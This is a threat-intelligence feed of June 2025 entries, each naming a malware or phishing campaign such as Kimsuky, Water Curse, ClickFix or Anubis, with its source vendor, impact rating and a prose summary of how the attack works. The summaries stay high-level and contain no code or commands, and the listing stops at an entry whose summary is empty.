Kimsuky_Targets_Academics_via_Phishing_Campaign
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky_Targets_Academics_via_Phishing_Campaign
- Date of Scan:
- 2025-06-17
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have uncovered a new phishing campaign by North Korean state-sponsored group called Kimsuky targeting professionals by impersonating thesis reviewers. They send phishing emails containing malicious password-protected Hangul Word Processor (HWP) documents. When the victim opens the file and enables content, it drops multiple files into the system’s temporary directory, including a BAT script that initiates a multi-stage infection process. This process installs a PowerShell script that collects system and antivirus data, exfiltrates the data to a Dropbox account controlled by the attackers and downloads additional payloads. The malware also abuses the legitimate remote access software AnyDesk by altering its configuration files with attacker-controlled versions, effectively all visual signs like tray icons and windows are hidden. Additionally, the attackers leverage scheduled task abuse, encoded payloads, and a step-by-step method to stay hidden and maintain access.
Water_Curse_GitHub_Malware_Campaign
MEDIUM
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- Water_Curse_GitHub_Malware_Campaign
- Date of Scan:
- 2025-06-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Trend Micro have uncovered a broad supply chain campaign conducted by a financially motivated threat actor tracked as Water Curse, targeting developers, security professionals, and gamers. The actor leverages at least 76 weaponized GitHub repositories to deliver multistage malware. The initial attack vector involves tricking users into downloading and compiling seemingly legitimate open-source tools, where malicious code embedded in Visual Studio project files executes during the build process. This initiates a complex infection chain using VBS and PowerShell scripts to deploy an Electron-based backdoor, which performs privilege escalation through UAC bypass, establishes persistence via scheduled tasks, and disables security defenses like Windows Defender and Volume Shadow Copies.
Katz_Stealer
LOW
+
—
- Intel Source:
- Picussecurity
- Intel Name:
- Katz_Stealer
- Date of Scan:
- 2025-06-16
- Impact:
- LOW
- Summary:
- Researchers from Picus have uncovered new information-stealing malware-as-a-service (MaaS) that emerged in 2025. The malware is distributed via phishing campaigns and trojanized software. It leverages multi-stage infection chain that includes obfuscated JavaScript droppers, PowerShell loaders and .NET-based UAC bypass techniques. The malware runs entirely in memory, hides inside legitimate Windows processes and uses images to secretly run malicious code. Once inside the system, it targets web browsers like Chrome and Firefox, email accounts, VPN services, file transfer programs and cryptocurrency wallets. Additionally, It takes control of Discord by injecting malicious code that runs every time the app starts, giving attackers remote access to the system.
Mamba2FA_Credential_Harvesting_Campaign
LOW
+
—
- Intel Source:
- Spider Labs
- Intel Name:
- Mamba2FA_Credential_Harvesting_Campaign
- Date of Scan:
- 2025-06-16
- Impact:
- LOW
- Summary:
- Researchers at SpiderLabs have identified an active phishing campaign leveraging a Phishing-as-a-Service (PhaaS) kit known as Mamba2FA. The attack begins with a lure themed as a "Secure Document Portal," designed to trick victims into entering their email address to access a purported document. Upon submission, the user is redirected to a counterfeit Microsoft login page for credential harvesting. The use of a PhishKit and PhaaS infrastructure indicates a commoditized and scalable threat, enabling less-skilled actors to deploy effective attacks.
Hive0131_Targets_Latin_America
MEDIUM
+
—
- Intel Source:
- IBM X-Force
- Intel Name:
- Hive0131_Targets_Latin_America
- Date of Scan:
- 2025-06-16
- Impact:
- MEDIUM
- Summary:
- Researchers at IBM X-Force have identified a surge in cyber-attacks involving DCRat across Latin America. These attacks are attributed to the financially motivated threat group Hive0131. The group send phishing emails impersonating Colombian judicial entities to tricks recipient into clicking on malicious links embedding in PDFs and Google Docs to initiate infection chains. These phishing campaigns deliver DCRat, a Malware-as-a-Service (MaaS) tool via obfuscated loaders such as VMDetectLoader which employs virtual machine detection, AMSI bypass and process hollowing to evade detection. The malware is capable of surveillance, data exfiltration, command execution and persistence through scheduled tasks or registry keys. Researchers also observed that the attackers use various methods such as JavaScript and VBScript to distribute the malware. Hive0131 appears to be shifted from traditional RATs like QuasarRAT and NjRAT to more advanced payloads like DCRat which make detection and removal more difficult.
Mirai_Variant_Exploits_DVRs_via_CVE_2024_3721
LOW
+
—
- Intel Source:
- Securelist
- Intel Name:
- Mirai_Variant_Exploits_DVRs_via_CVE_2024_3721
- Date of Scan:
- 2025-06-16
- Impact:
- LOW
- Summary:
- Researchers from Securelist have observed a new Mirai botnet variant actively exploiting a remote code execution vulnerability (CVE-2024-3721) in internet-exposed TBK DVR devices. The campaign uses a crafted POST request to download and execute a malicious ARM32 binary, immediately compromising the device without reconnaissance. The malware is a Mirai variant enhanced with anti-evasion features, including RC4-encrypted strings and checks to detect virtualization and emulation environments.
Anubis_RaaS_Group
MEDIUM
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- Anubis_RaaS_Group
- Date of Scan:
- 2025-06-16
- Impact:
- MEDIUM
- Summary:
- Trend Micro researchers have discovered new ransomware strain called Anubis which operates as a ransomware-as-a-service (RaaS) operation active since December 2024. It includes a file-wiping feature alongside traditional encryption, creating a dual-threat approach that puts extra pressure on victims to pay the ransom. Anubis affiliates gain access through spear-phishing campaigns and leverage advanced techniques such as privilege escalation, access token manipulation and shadow copy deletion to prevent recovery. Anubis has targeted organizations in various sectors, especially healthcare and construction with confirmed attacks in countries including Australia, Canada, Peru and the U.S. The group operates on cybercrime forums such as RAMP and XSS, offering flexible affiliate programs to other cybercriminal groups.
Spectra_Ransomware_Double_Extortion
MEDIUM
+
—
- Intel Source:
- K7 Labs
- Intel Name:
- Spectra_Ransomware_Double_Extortion
- Date of Scan:
- 2025-06-16
- Impact:
- MEDIUM
- Summary:
- Researchers from K7 Security Labs have observed Spectra Ransomware, an emerging double-extortion threat targeting Windows-based systems. Attackers demand a $5,000 Bitcoin payment within a 72-hour deadline, threatening to leak stolen data if victims do not comply. The malware achieves persistence by creating a Run registry key and masquerading as svchost.exe in the AppData folder.
Fileless_AsyncRAT_via_Clickfix_Lure
LOW
+
—
- Intel Source:
- cloudsek
- Intel Name:
- Fileless_AsyncRAT_via_Clickfix_Lure
- Date of Scan:
- 2025-06-16
- Impact:
- LOW
- Summary:
- Researchers at CloudSEK have identified an active fileless malware campaign distributing AsyncRAT to German-speaking users. The attack, ongoing since at least April 2025, begins with a Clickfix-themed website that socially engineers victims into executing a malicious PowerShell command through a fake CAPTCHA prompt. The initial command downloads a second-stage, obfuscated PowerShell script, which then decodes and reflectively loads a C# AsyncRAT payload directly into memory, evading file-based detection. The malware leverages legitimate system utilities like conhost.exe and PowerShell for stealthy execution, establishes persistence via RunOnce registry keys, and communicates with a command-and-control server over TCP port 4444.
ClickFix_Social_Engineering_Attack_Chain
LOW
+
—
- Intel Source:
- Darktrace
- Intel Name:
- ClickFix_Social_Engineering_Attack_Chain
- Date of Scan:
- 2025-06-16
- Impact:
- LOW
- Summary:
- Researchers from Darktrace have observed threat actors, including APT groups like APT28 and MuddyWater, leveraging a social engineering tactic dubbed "ClickFix" to gain initial access and exfiltrate data from organizations. This prolific campaign, observed in early 2025 across EMEA and the United States, targets the human user as the weakest link through phishing or malvertising that directs victims to a fake prompt, such as a CAPTCHA or error message. These prompts trick users into manually executing a malicious PowerShell command, which establishes command and control (C2) communication. This allows attackers to download secondary payloads like XWorm or Lumma, move laterally, and exfiltrate sensitive system information.
APT41_Uses_Google_Calendar_for_C2
MEDIUM
+
—
- Intel Source:
- Resecurity
- Intel Name:
- APT41_Uses_Google_Calendar_for_C2
- Date of Scan:
- 2025-06-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Resecurity have uncovered that the Chinese state-sponsored threat actor called APT 41 which is involved in both espionage and cybercrime, has launched a new campaign leveraging Google Calendar as a covert C2 channel. The threat actor gains initial access through spear phishing emails containing a ZIP archive disguised as export documentation which includes malicious LNK files and decoy images. Upon execution, a series of malware components - PLUSDROP, PLUSINJECT, and TOUGHPROGRESS activate and run directly in the system’s memory, using process hollowing, and hiding inside legitimate system processes to avoid detection. The final payload TOUGHPROGRESS, communicates with attacker-controlled Google Calendar events to receive commands and sends stolen data back by writing it into new calendar entries. This malware is highly advanced and capable of altering the Windows operating system, which could allow the attackers to take full control of the system and erase traces of their activity.
Quasar_RAT_via_Obfuscated_Batch_Files
LOW
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Quasar_RAT_via_Obfuscated_Batch_Files
- Date of Scan:
- 2025-06-12
- Impact:
- LOW
- Summary:
- Researchers at ISC.SANS have identified an active campaign delivering the Quasar Remote Access Trojan (RAT) through a multi-stage infection process. Threat actors initiate the attack with a simple batch script that opens a decoy document to deceive the user while concurrently using PowerShell to download and execute a second, heavily obfuscated batch file.
Italian_Remcos_Malware_Campaign
MEDIUM
+
—
- Intel Source:
- CERT-AGID
- Intel Name:
- Italian_Remcos_Malware_Campaign
- Date of Scan:
- 2025-06-12
- Impact:
- MEDIUM
- Summary:
- Researchers at cert agid have identified a malware campaign targeting Italy, active around June 10-11, 2025. Threat actors are distributing the Remcos Remote Access Trojan (RAT) via email, using malicious ZIP file attachments. The campaign leverages a financial lure with an email subject of "AV: Avviso di pagamento" (Payment notice) to trick recipients into executing the payload. The use of the "ModiLoader" tag suggests a potential multi-stage infection chain. The primary motivation appears to be financial, using the RAT's capabilities for credential theft, data exfiltration, and full remote control of compromised systems.
Arkana_Ransomware_Exfiltrates_Brokerage_Data
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- Arkana_Ransomware_Exfiltrates_Brokerage_Data
- Date of Scan:
- 2025-06-12
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC have observed the Arkana ransomware group claiming responsibility for a significant data breach targeting in a UK-based global online brokerage firm. The group exfiltrated approximately 50 GB of data, including sensitive Know Your Customer (KYC) records and customer information, and threatened to leak or sell the dataset if a ransom was not paid by June 10, 2025. This double-extortion attack, publicized on the group's dedicated leak site, was focused on monetizing the stolen information. The incident highlights a severe threat to the financial sector, where exfiltrated KYC data presents a high risk of identity theft and fraud.
Fog_Ransomware_Employs_Unusual_Toolset
MEDIUM
+
—
- Intel Source:
- Symantec
- Intel Name:
- Fog_Ransomware_Employs_Unusual_Toolset
- Date of Scan:
- 2025-06-12
- Impact:
- MEDIUM
- Summary:
- Symantec researchers have reported attack against a financial institution in Asia involving the Fog ransomware. The operators demonstrated an unusual methodology, blending ransomware deployment with espionage-style tactics. After an approximate two-week dwell time, the attackers deployed a unique toolset including the legitimate employee monitoring software Syteca for spying, and open-source C2 frameworks like GC2 and Adaptix for command and control. Notably, the threat actors established persistence via a new service after deploying the ransomware, a clear deviation from typical smash-and-grab ransomware behavior. This post-encryption activity suggests a dual motive: the ransomware may have been a decoy for a more persistent espionage operation, or an opportunistic monetization of an existing intrusion.
BrowserVenom_Spreads_Via_Fake_AI_Download_Ads
LOW
+
—
- Intel Source:
- Securelist
- Intel Name:
- BrowserVenom_Spreads_Via_Fake_AI_Download_Ads
- Date of Scan:
- 2025-06-12
- Impact:
- LOW
- Summary:
- Researchers from Securelist have identified a new malware campaign leveraging the DeepSeek-R1 LLM to distribute an implant dubbed BrowserVenom. The threat actors are believed to be Russian speaking based on code comments, use malicious online ads to lure people searching for DeepSeek r1 are redirected to a fake site that delivers a trojanized installer named AI_Launcher_1.21.exe. When executed, the file starts a multi-stage infection process involving fake CAPTCHA screens, PowerShell-based defense evasion, and downloads and installs the final payload called BrowserVenom which installs a malicious certificate and silently changes the settings of all major web browsers. The campaign has been observed in Brazil, Cuba, Mexico, India, Nepal, South Africa and Egypt, showing a wide geographical distribution.
DCRat_Targeting_Blockchain_Users
LOW
+
—
- Intel Source:
- Qi'anxin Threat Intelligence Center
- Intel Name:
- DCRat_Targeting_Blockchain_Users
- Date of Scan:
- 2025-06-12
- Impact:
- LOW
- Summary:
- Qi'anxin Threat Intelligence Center and the Skyrocket Falcon team have identified a financially motivated campaign targeting blockchain and cryptocurrency users. Unknown attackers deliver a malicious ZIP archive containing a shortcut file (LNK) via the Telegram messaging application. Execution of the lure file initiates a multi-stage infection process that uses VBScript and PowerShell to download components from cloud storage. The attack leverages DLL side-loading, using legitimately signed executables to load a malicious DLL, which then loads and injects the DCRat remote access trojan (RAT) into memory. This methodology is designed to evade detection by traditional security tools. The attackers' infrastructure also hosts fraudulent cryptocurrency investment websites, indicating the primary objective is theft.
Winos_4_0_Behind_Operation_Holding_Hands
MEDIUM
+
—
- Intel Source:
- somedieyoungZZ
- Intel Name:
- Winos_4_0_Behind_Operation_Holding_Hands
- Date of Scan:
- 2025-06-12
- Impact:
- MEDIUM
- Summary:
- Researcher somedieyoungZZ have detailed the 'Operation Holding Hands' campaign, a multi-stage attack attributed to the China-linked Silver Fox APT group. Targeting users in Japan and Taiwan, the campaign begins with a phishing lure—a digitally signed executable masquerading as a salary revision notice. This initial payload leverages its stolen certificate to appear legitimate while it drops and unpacks subsequent stages using COM objects. The malware employs sophisticated evasion techniques, including DLL search order hijacking and dynamic API resolution via configuration files, to minimize its forensic footprint. The final payload is a memory-resident backdoor, identified as Winos 4.0, which connects to hardcoded C2 infrastructure for persistent access and espionage.
Transparent_Tribe_DISGOMOJI_Targeting_Linux
MEDIUM
+
—
- Intel Source:
- 360 Threat Intelligence Center
- Intel Name:
- Transparent_Tribe_DISGOMOJI_Targeting_Linux
- Date of Scan:
- 2025-06-11
- Impact:
- MEDIUM
- Summary:
- The 360 Threat Intelligence Centre have revealed a new espionage campaign by the South Asian threat actor APT-C-56, also known as Transparent Tribe. The group is targeting Indian government and military personnel with a complex, multi-stage DISGOMOJI malware variant designed for Linux systems. Initial access is gained through social engineering, tricking users into running a Golang ELF loader disguised as a password utility for a lure PDF document. The highly resilient attack chain leverages Google Drive for payload delivery and Google Cloud Platform for command-and-control, bypassing traditional network defenses. Once established, the final payload steals system information, exfiltrates documents, harvests Firefox browser credentials, and deploys the MeshAgent remote access tool for long-term persistence.
CYBEREYE_RAT
LOW
+
—
- Intel Source:
- Cyfirma
- Intel Name:
- CYBEREYE_RAT
- Date of Scan:
- 2025-06-11
- Impact:
- LOW
- Summary:
- Cyfirma researchers have identified a new .NET-based malware called CyberEye also known as TelegramRAT which is actively distributed through GitHub repository and Telegram channels operated by threat actors using the aliases @cisamu123 and @CodQu. The malware is deployed through a GUI-based builder that enables low-skill cybercriminals to generate customized payloads with features such as keylogging, credential theft, clipboard hijacking and persistence mechanisms. CyberEye uses Telegram to communicate with attackers, so they don’t need to set up their own servers. It turns off Windows Defender using system settings and PowerShell commands and attempts to gain higher system privileges. It steals saved passwords from browsers, session data from apps like Telegram, Discord, and Steam and sends sensitive files and screenshots back to the attacker.
FIN6_Delivers_More_Eggs_Malware
MEDIUM
+
—
- Intel Source:
- DTI
- Intel Name:
- FIN6_Delivers_More_Eggs_Malware
- Date of Scan:
- 2025-06-11
- Impact:
- MEDIUM
- Summary:
- DTI researchers have uncovered a phishing campaign conducted by financially motivated group called Skeleton Spider also tracked as FIN6 leveraging deceptive job application lures to distribute More_Eggs malware. The group initiates contact with recruiters on professional job platforms like LinkedIn and Indeed, impersonating job seekers. They send phishing messages containing links to fake resume websites that appear legitimate but are actually controlled by the attackers. These fraudulent sites are registered anonymously and hosted on trusted cloud services like AWS. The attackers employ techniques such as CAPTCHA challenges, filtering based on IP address, and behavioral checks to selectively deliver malicious ZIP files. The payload chain includes a disguised .LNK file that executes JavaScript via wscript.exe, enabling credential theft, command execution, and potentially install such as ransomware. FIN6 abuses cloud services like Amazon CloudFront and S3 to obscure the origin of the attack and evade detection.
RubyGems_Exploit_Telegram_Ban_for_Data_Theft
LOW
+
—
- Intel Source:
- Socket
- Intel Name:
- RubyGems_Exploit_Telegram_Ban_for_Data_Theft
- Date of Scan:
- 2025-06-10
- Impact:
- LOW
- Summary:
- Researchers at Socket have identified an ongoing supply chain attack targeting the RubyGems ecosystem, where a threat actor, using Vietnamese-formatted aliases, published malicious gems named fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram around May 24 and May 30, 2025. These gems typosquat legitimate Fastlane plugins and were released shortly after Vietnam's nationwide Telegram ban, exploiting the increased demand for proxy solutions. The malware operates by redirecting Telegram API calls through an attacker-controlled C2 server, silently exfiltrating bot tokens, chat IDs, messages, and files from developers, particularly those using CI/CD pipelines.
SharePoint_Phishing_Exploits_Trusted_Links
MEDIUM
+
—
- Intel Source:
- CyberProof
- Intel Name:
- SharePoint_Phishing_Exploits_Trusted_Links
- Date of Scan:
- 2025-06-10
- Impact:
- MEDIUM
- Summary:
- CyberProof researchers have observed a significant surge in phishing campaigns that abuse legitimate Microsoft SharePoint links to evade detection and harvest credentials. Attackers leverage the inherent trust users and security tools place in SharePoint URLs to deliver multi-stage credential harvesting pages. These attacks are increasingly sophisticated, often requiring the specific victim's email address and a legitimate Microsoft-sent one-time code to proceed, foiling automated analysis. Following a successful compromise, threat actors have been observed adding their own multi-factor authentication (MFA) methods and creating malicious inbox rules to maintain persistence and further infiltrate the organization.
SoraAI_Clickbait_InfoStealer
LOW
+
—
- Intel Source:
- K7 Labs
- Intel Name:
- SoraAI_Clickbait_InfoStealer
- Date of Scan:
- 2025-06-10
- Impact:
- LOW
- Summary:
- According to analysis by K7 Labs, an information stealer is being distributed using social engineering tactics that leverage interest in generative AI tools. The campaign, first observed in late May 2025, begins when a user executes a malicious shortcut file (.lnk) masquerading as OpenAI's Sora. This initiates a multi-stage download process using PowerShell to fetch payloads from a public GitHub repository. The final payload is a comprehensive Python-based stealer that establishes persistence and proceeds to harvest a wide array of sensitive data, including browser credentials, cookies, credit card details, cryptocurrency wallets, gaming platform session data, and sensitive files from the victim's machine.
DanaBot_C2_Memory_Leak_DanaBleed
MEDIUM
+
—
- Intel Source:
- Zscaler
- Intel Name:
- DanaBot_C2_Memory_Leak_DanaBleed
- Date of Scan:
- 2025-06-10
- Impact:
- MEDIUM
- Summary:
- Zscaler researchers have discovered a critical memory leak vulnerability, dubbed "DanaBleed," within the command-and-control (C2) infrastructure of the DanaBot Malware-as-a-Service (MaaS) platform. Introduced in a June 2022 software update, a programming error in the Delphi-based C2 server caused it to append uninitialized memory to network responses, leaking sensitive data until early 2025. This flaw, comparable to the 2014 Heartbleed bug, exposed the group's internal operations, including threat actor credentials, backend infrastructure IPs and onion domains, private cryptographic keys, and exfiltrated victim information.
BladedFeline_Target_Kurdish_and_Iraqi_Officials
MEDIUM
+
—
- Intel Source:
- ESET
- Intel Name:
- BladedFeline_Target_Kurdish_and_Iraqi_Officials
- Date of Scan:
- 2025-06-09
- Impact:
- MEDIUM
- Summary:
- ESET researchers have discovered an Iran-aligned APT group called BladedFeline which is believed to be a subgroup of OilRig APT. The group has been active since at least 2017 and targets high-ranking officials within the Kurdistan Regional Government (KRG), the Government of Iraq (GOI), and a telecom provider in Uzbekistan. This group leverages custom malware such as Shahmaran, Whisper, Slippery Snakelet, the PrimeCache IIS module and reverse tunneling tools like Laret and Pinar. These tools are designed to maintain long-term access to compromised systems, steal sensitive data and execute remote commands. It is believed that the group gains initial access by exploiting internet-facing applications and using stolen email accounts. The group’s primary objective is long-term intelligence gathering to monitor political developments in the region and reduce Western influence.
Operation_DRAGONCLONE
MEDIUM
+
—
- Intel Source:
- Seqrite
- Intel Name:
- Operation_DRAGONCLONE
- Date of Scan:
- 2025-06-09
- Impact:
- MEDIUM
- Summary:
- Researchers from Seqrite Labs have uncovered a sophisticated cyberattack targeting China Mobile Tietong Co., Ltd., a subsidiary of China Mobile, leveraging a multi-stage malware delivery chain involving VELETRIX and VShell. The attack began in May 2025 and used a deceptive internal training ZIP file to trick users into opening it. The ZIP file contained legitimate signed binaries and a hidden malicious file that exploited DLL sideloading to deploy VELETRIX. The malware employs advanced techniques to avoid detection including tricks to bypass sandbox analysis, IP obfuscation and executing malicious code in memory. Its primary objective is to load VShell, a framework that used to control compromised machines. VShell communicates via standard Windows networking features and is known to be used by Chinese state-sponsored groups like UNC5174 and Earth Lamia. Additionally, researchers identified connections between this campaign and other known tools like Cobalt Strike and SuperShell with command servers based in China, Hong Kong, and the US.
Threat_Actor_Pivot_to_New_Evasion_Tools
LOW
+
—
- Intel Source:
- Esentire
- Intel Name:
- Threat_Actor_Pivot_to_New_Evasion_Tools
- Date of Scan:
- 2025-06-09
- Impact:
- LOW
- Summary:
- Researchers from eSentire have observed threat actors demonstrating significant operational resilience following the recent law enforcement takedown of a prominent malware scanning service during "Operation Endgame." The dismantled platform was a key tool for cybercriminals, allowing them to test malware evasion capabilities against security products without the risk of their samples being shared with vendors. eSentire's analysis shows threat actors have quickly migrated to alternative "no distribute" scanning services to continue refining their malicious payloads. This behavior is part of a systematic process where actors use crypters to pack malware and then iteratively test it until detection rates are acceptably low, enabling more effective campaigns.
FormBook_Delivers_through_Malicious_Excel_File
LOW
+
—
- Intel Source:
- Fortinet
- Intel Name:
- FormBook_Delivers_through_Malicious_Excel_File
- Date of Scan:
- 2025-06-09
- Impact:
- LOW
- Summary:
- Researchers from FortiGuard have identified an ongoing phishing campaign leveraging Microsoft Office vulnerability CVE-2017-0199 to install the FormBook information-stealing malware. The campaign targets Microsoft Windows users who still uses outdated Office versions (2007–2016) through emails masquerading as sales orders with malicious Excel attachments. Once opened, the embedded OLE object exploits the CVE-2017-0199 vulnerability to retrieve and execute a remote HTA script via mshta.exe. This script downloads and executes a secondary payload into directory to ultimately deploy the FormBook malware. The malware is capable of harvesting credentials, keystrokes and clipboard data. The attackers employ anti-debugging techniques and obfuscation to evade detection
NS1419_Ransomware_Deploy_via_Fake_Cracking_Tool
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- NS1419_Ransomware_Deploy_via_Fake_Cracking_Tool
- Date of Scan:
- 2025-06-08
- Impact:
- MEDIUM
- Summary:
- Researchers at ASEC have discovered a new ransomware campaign that disguises itself as a password-cracking tool to trick users into installing it. The malware is built with PyInstaller and masquerades as a brute-force utility, targeting users seeking unauthorized access tools. Upon execution, the tool simulates HTTP requests and password attempts but in the background, it secretly encrypts the user's files using strong AES-256 encryption in CFB mode. The ransomware avoids encrypting system critical directories such as Program Files and Windows. It renames affected files name by adding [.]NS1419 and drops a ransom note demanding $350 in Bitcoin. However, the ransomware does not store or send the decryption key, meaning there’s no way to recover the files even if the ransom is paid.
Attackers_Use_SVG_Images_to_Steal_Credentials
LOW
+
—
- Intel Source:
- Threatdown
- Intel Name:
- Attackers_Use_SVG_Images_to_Steal_Credentials
- Date of Scan:
- 2025-06-08
- Impact:
- LOW
- Summary:
- Threatdown researchers have uncovered a phishing campaign leveraging SVG files embedded with obfuscated JavaScript to steal Microsoft credentials. The attack begins with a spoofed internal email sent to an employee at a logistics company that contains an SVG attachment. These files include obfuscated JavaScript that only runs when the document changes, using a MutationObserver to evade detection. The script decodes a hex-encoded payload and redirects the victim to a phishing site. When the user enters their password, attackers can steal it and potentially access the company’s internal systems, sensitive files or even deploy ransomware.
PathWiper_Targets_Ukrainian_Critical_Infrastructure
LOW
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- PathWiper_Targets_Ukrainian_Critical_Infrastructure
- Date of Scan:
- 2025-06-08
- Impact:
- LOW
- Summary:
- Researchers from Cisco Talos have discovered a new malware campaign targeting a critical infrastructure organization in Ukraine by leveraging a data-wiping malware dubbed PathWiper which is distributed through a legitimate endpoint management tool. The attackers execute malicious console commands to run a VBScript which then delivers and activates PathWiper across multiple systems. Once deployed, the malware scan for all current and previously connected storage devices including network drives and permanently destroyed data by overwriting files and key components of the New Technology File System (NTFS) with random data. PathWiper’s tactics closely resemble with HermeticWiper, a destructive tool previously attributed to Russia’s Sandworm group. Researchers attribute this operation to a Russia-aligned state-sponsored threat actor with high confidence.
Hacktivist_Groups_Pivot_to_RaaS
MEDIUM
+
—
- Intel Source:
- Rapid7
- Intel Name:
- Hacktivist_Groups_Pivot_to_RaaS
- Date of Scan:
- 2025-06-08
- Impact:
- MEDIUM
- Summary:
- Rapid7 researchers have observed a significant shift among hacktivist groups such as FunkSec, KillSec, and GhostSec, transitioning to financially motivated cybercrime, specifically Ransomware-as-a-Service (RaaS) operations. Initially driven by political or social ideologies and engaging in DDoS and defacement attacks, these groups have increasingly adopted double extortion tactics—data exfiltration and encryption—leveraging RaaS models for profit. FunkSec, emerging in December 2024 and aligning with "Free Palestine," now targets diverse sectors globally using AI-generated FunkLocker ransomware. KillSec, active since 2021 and Russia-aligned, shifted to ransomware in October 2023, offering KillSecurity ransomware for Windows and ESXi. GhostSec, known since 2015 for #OpIsis, partnered with Stormous ransomware in July 2023, launched GhostLocker RaaS in October 2023, and announced a return to hacktivism in May 2024, leaving GhostLocker with Stormous.
AMOS_Variant_Targets_Spectrum_Users_via_Clickfix
LOW
+
—
- Intel Source:
- cloudsek
- Intel Name:
- AMOS_Variant_Targets_Spectrum_Users_via_Clickfix
- Date of Scan:
- 2025-06-07
- Impact:
- LOW
- Summary:
- Researchers at CloudSEK have identified an active campaign by Russian-speaking threat actors distributing a new Atomic macOS Stealer (AMOS) variant, first detailed around June 4, 2025. The operation leverages typo-squatted domains impersonating the U.S. telecom provider Spectrum and employs the Clickfix social engineering method, tricking users into executing malicious code. Attackers deliver operating system-specific payloads: macOS users are served a shell script to harvest system passwords and deploy the AMOS stealer by bypassing native security controls, while Windows users receive PowerShell commands.
Headerless_Malware_Uncovered
LOW
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Headerless_Malware_Uncovered
- Date of Scan:
- 2025-06-07
- Impact:
- LOW
- Summary:
- FortiGuard researchers have discovered a Remote Access Trojan (RAT) that infected a Windows system and remained active for several weeks without being detected. This malware runs directly in the system memory without a valid PE header which makes it hard for regular security tools to detect. It starts through scripts and PowerShell commands and runs under a process called dllhost.exe. It connects to its C2 server using a secure connection over port 443 and protect stolen data such as system info and JPEG screenshots by encrypting it with a custom XOR method. The malware can capture victim’s screen, receive remote commands and manipulate system services, showing it is designed for deep system access and long-term spying.
ViperSoftX_Variant
LOW
+
—
- Intel Source:
- K7 Security Labs
- Intel Name:
- ViperSoftX_Variant
- Date of Scan:
- 2025-06-07
- Impact:
- LOW
- Summary:
- Researchers from K7 Labs have uncovered the ViperSoftX malware targeting Windows system through cracked software distributed via torrent platforms. The malware is primarily used to deliver information stealers and cryptocurrency hijackers. Upon execution, it leverages hidden PowerShell loader to install and execute second payload disguised as a legitimate DLL. This DLL contains a Lua script engine that runs hidden Lua scripts stored inside an encrypted ZIP file. Its primary objective is to steal personal information and cryptocurrency, especially by watching the clipboard for wallet addresses to hijack.
DuplexSpy_RAT_Target_Window_Users
LOW
+
—
- Intel Source:
- Cyfirma
- Intel Name:
- DuplexSpy_RAT_Target_Window_Users
- Date of Scan:
- 2025-06-06
- Impact:
- LOW
- Summary:
- CYFIRMA researchers have identified a new malware called DuplexSpy RAT that targets Windows systems. It was originally released publicly on GitHub by a user named ISSAC/iss4cfOng for educational purposes but now cybercriminals have been started using it. DuplexSpy allows attackers to fully control infected machine including logging keystrokes, recording screens, turning on webcams and microphones, running remote commands and even moving the mouse. It hides itself by copying files to startup folders, changing registry settings, injecting code into other programs and using encryption to avoid detection. It can also disguise itself as a legitimate Windows update and shuts down security software to stay hidden.
Malicious_NPM_Crypto_Wallet_Drainers
LOW
+
—
- Intel Source:
- Socket
- Intel Name:
- Malicious_NPM_Crypto_Wallet_Drainers
- Date of Scan:
- 2025-06-06
- Impact:
- LOW
- Summary:
- Researchers at Socket have identified four malicious npm packages designed to drain Ethereum and BSC cryptocurrency wallets. These packages, created by an actor named @crypto-exploit (registered with a Russian webmail address) between three to four years ago, collectively amassed over 2,100 downloads. The malware, embedded within packages like pancake_uniswap_validators_utils_snipe and env-process, uses obfuscated JavaScript that relies on environment variables for wallet private keys and then attempts to transfer 80-85% of the victim's wallet balance to a threat actor-controlled address. This known tactic aims for stealth and persistence by leaving some funds for gas fees.
Fake_Zoom_Client_Delivers_RAT
LOW
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Fake_Zoom_Client_Delivers_RAT
- Date of Scan:
- 2025-06-06
- Impact:
- LOW
- Summary:
- Researchers at ISC.SANS have found a campaign distributing malware through fake Zoom client updates, observed around June 4, 2025. Attackers lure victims with phishing emails containing fake Zoom meeting invitations. Clicking the embedded link directs users to a webpage prompting a Zoom client update, which, if downloaded, delivers an executable ("Session.ClientSetup.exe"). This initial payload acts as a downloader, deploying an MSI package that installs ScreenConnect, a legitimate remote access tool, configured for malicious control by the attackers and establishing persistence as a service. The primary objective appears to be gaining unauthorized remote access to victim systems. This tactic leverages the widespread reliance on collaborative tools, particularly since the shift to remote work, posing a significant risk of unauthorized access and potential follow-on attacks.
Malware_Disguised_as_AI_Tool_Installers
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Malware_Disguised_as_AI_Tool_Installers
- Date of Scan:
- 2025-06-06
- Impact:
- MEDIUM
- Summary:
- Researchers from Cisco Talos have identified a significant trend where cybercriminals disguise malware as popular AI tools to trick users into downloading them. These fake AI installers are being used to spread three different threats such as CyberLock ransomware, Lucky_Gh0$t ransomware and a newly discovered malware called Numero. The attackers are mainly targeting people and businesses in technology, marketing, and B2B sales. To lure victims, the attackers use tactics like search engine manipulation and fake messages on platforms like Telegram and social media. CyberLock is ransomware that encrypts files and demands $50,000 in Monero, falsely claiming the money supports humanitarian causes. On the other hand, Lucky_Gh0$t is a Yashma ransomware variant, hidden in a fake ChatGPT installer and uses Microsoft AI tools to look legitimate and avoid detection. The third threat, Numero is a destructive malware that disguised as an AI video creation tool but makes Windows systems disable by replacing text and buttons with random numbers.
Lazarus_Stealer_Targets_Professionals
LOW
+
—
- Intel Source:
- Any.Run
- Intel Name:
- Lazarus_Stealer_Targets_Professionals
- Date of Scan:
- 2025-06-05
- Impact:
- LOW
- Summary:
